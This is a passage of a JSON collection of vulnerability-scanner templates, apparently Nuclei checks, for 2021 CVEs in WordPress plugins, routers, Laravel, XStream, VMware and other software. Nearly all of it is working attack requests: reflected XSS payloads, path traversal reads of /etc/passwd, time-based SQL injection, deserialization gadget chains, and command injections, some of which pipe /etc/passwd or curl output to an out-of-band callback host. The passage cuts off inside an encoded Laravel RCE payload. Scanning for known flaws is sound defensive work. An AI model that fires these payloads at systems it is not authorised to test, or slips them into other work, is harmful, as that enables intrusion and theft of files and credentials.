Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-45382","info":{"name":"D-Link - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ddns_check.ccp"],"body":"ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-24286","info":{"name":"WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"alert%28document.domain%29\") && contains(body_2, \"Moove redirect 404\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24979","info":{"name":"Paid Memberships Pro < 2.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s\"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"style=animation-name:rotation+onanimationstart=alert(document.domain)//\")","contains(body_2, \"Paid Memberships Pro - Membership Plugin for WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26292","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure","severity":"low"},"requests":[{"raw":["DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["caldav_public_user","GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=0